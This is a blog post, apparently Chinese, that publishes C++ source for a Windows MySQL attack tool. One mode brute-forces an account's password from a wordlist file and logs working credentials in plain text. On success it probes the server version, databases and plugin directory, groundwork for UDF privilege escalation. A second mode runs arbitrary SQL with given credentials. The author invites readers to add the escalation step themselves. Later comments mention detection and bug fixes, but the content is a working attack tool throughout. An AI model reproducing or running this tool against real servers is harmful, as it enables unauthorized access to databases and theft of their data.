
MySQL 利用小工具源码

2015-12-30 10:41 549 查看
#include "StdAfx.h"
#include "Sql.h"
#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <mysql.h>

#pragma comment(linker,"/nodefaultlib:LIBCMT.lib")
#pragma comment(linker,"/nodefaultlib:MSVCRTD.lib")
#if defined _DEBUG
#pragma comment(lib, "mysqlclient_debug.lib")
#else
#pragma comment(lib, "mysqlclient.lib")
#endif
#pragma comment(lib, "wsock32.lib")
#pragma comment(lib, "Advapi32.lib")

// Default constructor. Nothing is initialised here; every method in this file
// creates and releases its own MySQL handle.
Sql::Sql(void) {}

// Destructor. There is nothing to release: connections and result sets are
// opened and closed inside the individual methods.
Sql::~Sql(void) {}

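// Append a NUL-terminated string to succ.txt in the current working directory.
//
// The only caller in this file (crack_mysql) passes a line that contains the
// host, user name and password in clear text, so succ.txt becomes a plaintext
// credential store and should be handled as a sensitive artifact.
//
// buffer: NUL-terminated text to append; a NULL pointer is ignored.
void Sql::writefiles(char* buffer)
{
    if (buffer == NULL)
    {
        return;
    }

    FILE* fp = fopen("succ.txt", "a+");
    if (fp == NULL)
    {
        // Nothing to close: the original called fclose(NULL) on this path,
        // which is undefined behaviour.
        return;
    }

    fwrite(buffer, strlen(buffer), 1, fp);
    fclose(fp);
}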

// Print the two accepted command-line shapes and terminate the process.
//
// help: text substituted for %s in both lines (main passes argv[0]).
// This function does not return: it ends the program with exit status 0.
void Sql::Usage(char* help)
{
    // Brute-force mode: <host> <user> crack
    fprintf(stdout, "[-]:%s Usage:->192.168.1.1->root->crack\r\n", help);

    // Query mode: <host> <user> sql <password> <statement>
    fprintf(stdout, "[-]:%s Usage:->192.168.1.1->root->sql->passwordroot->select user()\r\n", help);

    exit(0);
}

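// Try a single MySQL login and, if it succeeds, record the credentials and
// print the first column of four fixed informational queries.
//
// main calls this once per line of pass.txt, and every call opens its own
// connection. On the server side a wordlist run therefore shows up as a burst
// of access-denied (error 1045) events for one account from one client
// address. Server-side throttling of consecutive failed logins (for example
// the connection_control plugin, where the server version provides it) limits
// this kind of guessing.
//
// ServerHost, Username, password: passed unchanged to mysql_real_connect.
// Returns 0 in every case; success is reported only through stdout and
// succ.txt.
//
// Fixes over the original: the result of mysql_init is checked, the status
// line is no longer used as a printf format string, a failed query no longer
// leads to mysql_fetch_row(NULL), and every result set is freed (previously
// only the last one was).
int Sql::crack_mysql(char* ServerHost,char* Username,char* password)
{
    static const char* const kProbeQueries[] = {
        "select version()",
        "select user()",
        "show databases",
        "select @@plugin_dir"
    };
    const size_t kProbeCount = sizeof(kProbeQueries) / sizeof(kProbeQueries[0]);

    MYSQL* conn = mysql_init(NULL);
    if (conn == NULL)
    {
        fprintf(stderr, "mysql_init failed\r\n");
        return 0;
    }

    if (!mysql_real_connect(conn, ServerHost, Username, password,
                            "mysql", 0, NULL, CLIENT_MULTI_STATEMENTS))
    {
        printf("Host:%s->Username:%s->Password:%s failed\r\n", ServerHost, Username, password);
        mysql_close(conn);
        return 0;
    }

    char buffer[1024] = {0};
    sprintf_s(buffer, "Host:%s->Username:%s->Password:%s successfuly\r\n\r\n", ServerHost, Username, password);

    // The line contains caller-supplied text (host, user, wordlist entry), so
    // it must be printed as data and never as the format string itself.
    printf("%s", buffer);
    writefiles(buffer);

    if (mysql_select_db(conn, "mysql"))
    {
        printf("Select Errors the mysql database!\r\n");
    }

    for (size_t i = 0; i < kProbeCount; ++i)
    {
        if (mysql_query(conn, kProbeQueries[i]))
        {
            fprintf(stderr, "%s\r\n", mysql_error(conn));
            continue; // the failed statement produced no result set
        }

        MYSQL_RES* res = mysql_use_result(conn);
        if (res == NULL)
        {
            fprintf(stderr, "%s\r\n", mysql_error(conn));
            continue;
        }

        // mysql_use_result streams rows, so the set has to be drained before
        // the next query is sent on the same connection.
        MYSQL_ROW row;
        while ((row = mysql_fetch_row(res)) != NULL)
        {
            // A SQL NULL arrives as a NULL pointer in the row array.
            printf("%s\r\n", row[0] != NULL ? row[0] : "(null)");
        }
        mysql_free_result(res);
    }

    mysql_close(conn);
    return 0;
}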

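// Connect with the given credentials, run one caller-supplied statement and
// print the first column of every row it returns.
//
// ServerHost, Username, password: passed unchanged to mysql_real_connect.
// sql: statement text sent to the server verbatim through mysql_query.
//
// Returns -2 when no result set is available (missing statement, failed
// statement, or a statement that returns no rows set) and 0 otherwise,
// including when the connection itself fails.
//
// The status lines written to stderr include the password in clear text;
// anything that captures this program's output captures the credential.
//
// Fixes over the original: the result of mysql_init is checked, the
// connection is closed on every exit path (it leaked on connect failure and
// on the -2 return), and NULL column values are not passed through sprintf_s.
int Sql::sql_exec(char* ServerHost,char* Username,char* password,char* sql)
{
    if (sql == NULL)
    {
        fprintf(stderr, "no SQL statement given\r\n");
        return -2;
    }

    MYSQL* conn = mysql_init(NULL);
    if (conn == NULL)
    {
        fprintf(stderr, "mysql_init failed\r\n");
        return 0;
    }

    if (!mysql_real_connect(conn, ServerHost, Username, password,
                            "mysql", 0, NULL, CLIENT_MULTI_STATEMENTS))
    {
        fprintf(stderr, "Host:%s->Username:%s->Password:%s failed\r\n", ServerHost, Username, password);
        mysql_close(conn);
        return 0;
    }

    fprintf(stderr, "Host:%s->Username:%s->Password:%s successfuly\r\n\r\n", ServerHost, Username, password);

    if (mysql_select_db(conn, "mysql"))
    {
        printf("Select Errors the mysql database!\r\n");
    }

    if (mysql_query(conn, sql))
    {
        fprintf(stderr, "%s\r\n", mysql_error(conn));
        // The original fell through to mysql_store_result, got NULL and
        // returned -2 with the connection still open.
        mysql_close(conn);
        return -2;
    }

    MYSQL_RES* res = mysql_store_result(conn);
    if (res == NULL)
    {
        mysql_close(conn);
        return -2;
    }

    MYSQL_ROW row;
    while ((row = mysql_fetch_row(res)) != NULL)
    {
        // A SQL NULL arrives as a NULL pointer in the row array.
        printf("%s\r\n", row[0] != NULL ? row[0] : "(null)");
    }

    mysql_free_result(res);
    mysql_close(conn);
    return 0;
}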

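// Entry point. Two modes, selected by a substring match on argv[3]:
//   <host> <user> crack                       - try every line of pass.txt
//   <host> <user> sql <password> <statement>  - run one statement
//
// In sql mode the password is a command-line argument, so it is visible to
// anything on the machine that can read process command lines.
//
// Fixes over the original: argv[3], argv[4] and argv[5] are read only after
// argc has been checked; the methods are called on a real Sql object instead
// of through a NULL pointer; line endings are stripped without indexing
// buffer[strlen(buffer) - 2], which read and wrote before the start of the
// buffer for lines shorter than two characters; and the open-failure message
// names the file that is actually opened.
int main(int argc,char* argv[])
{
    Sql newsql;

    if (argc < 4)
    {
        newsql.Usage(argv[0]); // prints the usage text and exits
        return 0;
    }

    char* ServerHost = argv[1];
    char* Username = argv[2];
    char* method = argv[3];

    if (strstr(method, "crack"))
    {
        FILE* fp = fopen("pass.txt", "rb");
        if (fp == NULL)
        {
            printf("Error:%lu, pass.txt not found\r\n", static_cast<unsigned long>(GetLastError()));
            return 0;
        }

        char buffer[MAX_PATH] = {0};
        while (fgets(buffer, MAX_PATH, fp) != NULL)
        {
            // Cut the line at the first CR or LF; strcspn returns the string
            // length when neither is present, so the index is always in range.
            buffer[strcspn(buffer, "\r\n")] = '\0';

            newsql.crack_mysql(ServerHost, Username, buffer);
            memset(buffer, 0, sizeof(buffer));
        }
        fclose(fp);
    }
    else if (strstr(method, "sql"))
    {
        if (argc < 6)
        {
            newsql.Usage(argv[0]);
            return 0;
        }

        char* password = argv[4];
        char* sql = argv[5];
        newsql.sql_exec(ServerHost, Username, password, sql);
    }

    return 0;
}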


头文件(Sql.h)

#pragma once
// Groups the tool's MySQL client routines. The class declares no data
// members, so an instance carries no state between calls.
class Sql
{
public:
    Sql(void);
    ~Sql(void);

    // Connection routines; both take the server host, account name and
    // password as NUL-terminated strings and return an int status.
    int crack_mysql(char* ServerHost, char* Username, char* password);
    int sql_exec(char* ServerHost, char* Username, char* password, char* sql);

    // Output helpers.
    void writefiles(char* buffer);
    void Usage(char* help);
};






本来还想写一个UDF 导出提权的,懒得写了。有兴趣的人可以自己去写。